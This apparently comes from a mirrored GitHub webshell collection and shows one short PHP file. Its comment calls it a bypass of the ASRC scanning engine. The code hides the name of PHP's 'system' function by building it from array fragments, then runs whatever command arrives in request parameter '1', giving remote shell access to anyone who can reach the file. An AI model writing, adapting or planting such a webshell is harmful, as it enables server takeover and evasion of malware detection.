mirror of
https://github.com/tennc/webshell
synced 2024-11-10 05:44:11 +00:00
7 lines
152 B
PHP
7 lines
152 B
PHP
|
<?php
|
||
|
//ASRC伏魔引擎bypass
|
||
|
$result = array_diff(["s","a","b","ys","te","m"],["a","b"]);
|
||
|
$a = join($result);
|
||
|
array_map($a,(array)$_REQUEST['1']);
|
||
|
?>
|